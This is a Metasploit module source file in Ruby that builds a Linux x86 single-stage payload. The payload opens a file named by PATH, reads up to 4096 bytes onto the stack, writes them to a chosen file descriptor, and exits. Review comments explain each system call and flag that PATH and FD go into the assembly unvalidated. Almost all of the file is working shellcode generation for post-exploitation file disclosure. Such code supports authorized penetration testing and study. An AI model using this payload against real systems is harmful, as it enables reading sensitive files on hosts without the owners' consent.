rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/x86/read_file.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Single-stage Linux x86 payload that reads one file and writes its contents
# to a file descriptor, then exits.
#
# The generated code issues four `int 0x80` system calls in a fixed order:
# open() on PATH with flags 0 (read-only), a single read() of at most 0x1000
# (4096) bytes, a single write() of the bytes read to FD, and exit(0).
# There is no loop, so only the first 4096 bytes of a larger file are
# written, and no system call return value is checked before the next call.
# For anyone tracing the process, that short open/read/write/exit sequence
# is the whole observable behaviour of this code.
module MetasploitModule
  # NOTE(review): presumably the byte size of the assembled payload as cached
  # by the framework for default options; the real size depends on the length
  # of PATH -- confirm how this value is maintained.
  CachedSize = 63

  include Msf::Payload::Single
  # NOTE(review): the Prepends mixin is defined outside this file; its effect
  # on the generated bytes cannot be seen from here.
  include Msf::Payload::Linux::X86::Prepends

  # Sets the module metadata and registers the two datastore options used by
  # #generate.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below via merge_info
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Read File',
        'Version' => '',
        'Description' => 'Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor',
        'Author' => 'hal',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X86
      )
    )

    # Register exec options
    # PATH is required and has no default; FD is required and defaults to 1.
    # NOTE(review): FD is declared as a string option although it is used as
    # a numeric immediate in the assembly text built by #generate.
    register_options(
      [
        OptString.new('PATH', [ true, 'The file path to read' ]),
        OptString.new('FD', [ true, 'The file descriptor to write output to', 1 ]),
      ]
    )
  end

  # Builds the assembly source for the payload and assembles it with Metasm
  # for the Ia32 CPU.
  #
  # @param _opts [Hash] unused
  # @return [String] the result of encode_string on the assembled shellcode
  def generate(_opts = {})
    fd = datastore['FD']

    # The assembly text is position independent: `jmp file` skips to the end,
    # where `call open` pushes the address of the bytes that follow it (the
    # NUL-terminated PATH string) and `pop ebx` picks that address up as the
    # first argument of open().
    #
    # The read buffer is the current stack pointer itself (ecx = esp); no
    # stack space is reserved, so up to 0x1000 bytes are written over
    # whatever sits at and above esp.
    #
    # NOTE(review): FD and PATH are interpolated verbatim into the assembly
    # text and are not validated here. A non-numeric FD, or a PATH containing
    # a double quote or a line break, would produce assembly other than what
    # is written below; validating both before interpolation would make the
    # output predictable.
    payload_data = <<-EOS
      jmp file

      open:
      mov eax,0x5 ; open() syscall
      pop ebx ; Holds the filename
      xor ecx,ecx ; Open for reading (0)
      int 0x80

      read:
      mov ebx,eax ; Store the open fd
      mov eax,0x3 ; read() syscall
      mov edi,esp ; We're just going to save on the stack
      mov ecx,edi ; Save at edi
      mov edx,0x1000 ; Read as much as we can
      int 0x80

      write:
      mov edx,eax ; Number of bytes to write
      mov eax,0x4 ; write() system call
      mov ebx,#{fd} ; fd to write to
      int 0x80

      exit:
      mov eax,0x1 ; exit() system call
      mov ebx,0x0 ; return 0
      int 0x80

      file:
      call open
      db "#{datastore['PATH']}", 0x00
    EOS

    # Assemble the text above and return the encoded bytes.
    Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
  end
end